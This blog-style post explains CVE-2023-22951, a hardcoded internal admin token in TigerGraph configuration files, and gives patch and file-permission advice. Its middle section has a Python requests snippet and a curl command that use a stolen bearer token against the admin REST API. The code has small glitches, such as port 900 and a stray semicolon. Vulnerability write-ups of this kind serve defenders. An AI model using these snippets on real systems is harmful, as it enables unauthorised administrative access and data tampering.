CVE-2023-22951 - TigerGraph Enterprise Free Edition 3.x Token Exposure — Anatomy of a Critical Exploit

TigerGraph is one of the popular graph database platforms trusted for powerful analytics. But in early 2023, researchers identified a critical vulnerability: CVE-2023-22951. This issue affects TigerGraph Enterprise Free Edition 3.x and allows attackers to gain admin access by abusing a hardcoded authentication token. In this post, we’ll break down how the vulnerability works, show code snippets for exploitation, and offer guidance on staying safe.

What’s the Problem?

TigerGraph’s internal systems create an authentication token that's more powerful than intended. Typically, this token is designed for system components to talk to each other without friction. The issue? This internal token is stored openly in configuration files. If an attacker can read this file, they can grab the token and use it to call the REST API with full admin privileges — and TigerGraph won’t even know its admin user isn't legit!

Token Creation:

TigerGraph configures an internal token (let’s call it INTERNAL_TOKEN) that never expires and is accepted by the REST API with full admin rights.

`

/home/tigergraph/app/config/configurations.cfg

`

API Trust:

The REST API trusts any bearer of this token as a system admin. No further identity check is performed.

Inside configurations.cfg (example)

...
"token_internal_system": "eyJhbGciOiJIUzI1NiI...ZjZmRnF",
...

Shown in Code: Exploiting the Flaw

If an attacker gets read access to the configuration file, getting admin access is a breeze.

Here’s a Python code snippet that "borrows" this token and calls a dangerous admin API

import requests

# Suppose you've read the config file and grabbed the token
internal_token = "eyJhbGciOiJIUzI1NiI...ZjZmRnF"

# TigerGraph API endpoint (change host as needed)
api_url = "http://target-tigergraph-host:900/restpp/admin";

headers = {
    "Authorization": f"Bearer {internal_token}"
}

# Example: get system admin details (could also add user, delete data, etc.)
response = requests.get(f"{api_url}/user", headers=headers)
print(response.status_code)
print(response.text)

With this, anyone with the token now controls the cluster.

Why Is This So Bad?

- Silent Exploitation: Logs won’t distinguish between a real system process and a hacker with the token.
- Full Admin Privileges: Attackers can delete data, change users, dump sensitive info, and more.
- Easy Access: If the config file is world-readable or can be accessed through other vulnerabilities (like directory traversal or LFI), exploitation is instant.

Sample cURL command

curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiI...ZjZmRnF" \
     http://target-tigergraph-host:900/restpp/admin/graph

If the token is valid, you’ll get a full list of graphs with admin control instead of a 401 Unauthorized error.

Is There a Patch?

YES!  
TigerGraph has released updates to address this security flaw. You should upgrade to the latest version ASAP.

- TigerGraph Security Bulletin
- NIST CVE Record

Only the tigergraph system user should be able to read config files.

`bash

chmod 600 /home/tigergraph/app/config/configurations.cfg

`

References and More Readings

- TigerGraph Advisory on CVE-2023-22951
- NVD - National Vulnerability Database
- Exploit Database (search for TigerGraph)
- TigerGraph Documentation | Authentication
- Security Best Practices for Database Admins

Conclusion

CVE-2023-22951 is a dangerous example of how an internal shortcut can open a massive security hole. If you use TigerGraph, treat every config file as potential gold for attackers, and never rely on secret tokens baked into files. Always upgrade, review permissions, and keep APIs behind locks.

Timeline

Published on: 04/13/2023 20:15:00 UTC
Last modified on: 04/24/2023 14:43:00 UTC